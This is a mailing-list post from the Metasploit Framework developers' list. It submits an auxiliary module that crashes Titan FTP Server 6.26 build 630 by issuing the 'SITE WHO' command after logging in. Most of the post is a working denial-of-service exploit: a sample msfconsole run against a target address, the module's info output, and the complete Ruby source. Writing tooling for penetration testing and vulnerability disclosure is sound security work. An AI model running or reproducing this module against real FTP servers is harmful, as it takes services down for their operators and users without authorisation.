-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey guys,

I've attached a DoS auxiliary module for the Titan FTP server v6.26 build 630,
based on the Python script from earlier today.


msf > use dos/ftp/titan626_site
msf auxiliary(titan626_site) > set RHOST 192.168.10.2
RHOST => 192.168.10.2
msf auxiliary(titan626_site) > set FTPUSER test
FTPUSER => test
msf auxiliary(titan626_site) > set FTPPASS test
FTPPASS => test
msf auxiliary(titan626_site) > run
[*] Connecting to FTP server 192.168.10.2:21...
[*] Connected to target FTP server.
[*] Authenticating as test with password test...
[*] Sending password...
[*] Sending command...
[*] Auxiliary module execution completed


msf auxiliary(titan626_site) > info

       Name: Titan FTP Server 6.26.630 SITE WHO DoS
    Version: 1

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FTPPASS  test             yes       Valid FTP password for username
  FTPUSER  test             yes       Valid FTP username
  RHOST    192.168.10.2     yes       The target address
  RPORT    21               yes       The target port

Description:
  The Titan FTP server v6.26 build 630 can be DoS'd by issuing "SITE
  WHO". You need a valid login so you can send this command.


Thanks,
Kris Katterjohn

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQIVAwUBSPU7kv9K37xXYl36AQL/DA//YHo5MLoeVi2YWZ5OtEiCZeT1oFJoUkvW
FEAtf3kXMU8sg3ndelJTDR670TkDy/hfYE5ZqNyEjb6sLslAOCso1og3g7z5dCsQ
x5ApNjTjmNiiQyY4uErpa/a1sORUGiIXrfn4Cyf3fZT4aA+G8ATUo6Y1ypi3IrAY
QkEK+9aQuAmhzbVhsFPnmIduHuCAHakpEjx4az9U+3j2+LUkBV94kn6tnLlMazjQ
2zVBrar9WrPQlpNzkaH7KMUpMft057+2H/UxWROjzXDGISfCkhqXwweyKeOk7lTT
gW+fDLxu2rbyR2X2G0nnEOSaWomeCrm2OZoQx+R/lciiB68vsFBBcf9kIQbs1r89
75nW9uxbtEGPSHYEXeabqL8KgCC+ckxUOzJL6sbnf3BasGvyPYdNi/yARGImIhUL
pbEyUO3YQRtwI3KcohpGHXNdf+9p72iOKRqH3vdLKNjlde0mLMh6QsJs1fieIaPE
hYgE9qs221I18TTmZljmLh6RyFoaM98eTHMCAUGJZlogr9d2ypv5/HQZnVN+2vlp
vCbpz7gfd61Db+cBTPWhBvGT28JArGr2ktsoJZiPmj6+ehWkZR2UjnGwSghwu6A6
xCpP0xjTxFKqLgqCUWu0Fer2s2P3yq+FV5OXHzawYFSCf7rJLM8qIcPJP1NksAXf
ReymTAm6UCc=
=0ama
-----END PGP SIGNATURE-----
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Ftp

        def initialize(info = {})
                super(update_info(info, 
                        'Name'           => 'Titan FTP Server 6.26.630 SITE WHO 
DoS',
                        'Description'    => %q{
                                The Titan FTP server v6.26 build 630 can be 
DoS'd by
                                issuing "SITE WHO".  You need a valid login so 
you
                                can send this command.
                        },
                        'Author'         => 'Kris Katterjohn <[EMAIL 
PROTECTED]>',
                        'License'        => MSF_LICENSE,
                        'Version'        => '1',
                        'References'     =>
                                [ [ 'URL', 'http://milw0rm.com/exploits/6753'] 
],
                        'DisclosureDate' => 'Oct 14 2008'))

                # They're required
                register_options([
                        OptString.new('FTPUSER', [ true, 'Valid FTP username', 
'anonymous' ]),
                        OptString.new('FTPPASS', [ true, 'Valid FTP password 
for username', 'anonymous' ])
                ])
        end

        def run
                connect_login
                print_status("Sending command...")
                raw_send("SITE WHO\r\n")
                sleep 1
                disconnect
        end
end

_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers

Reply via email to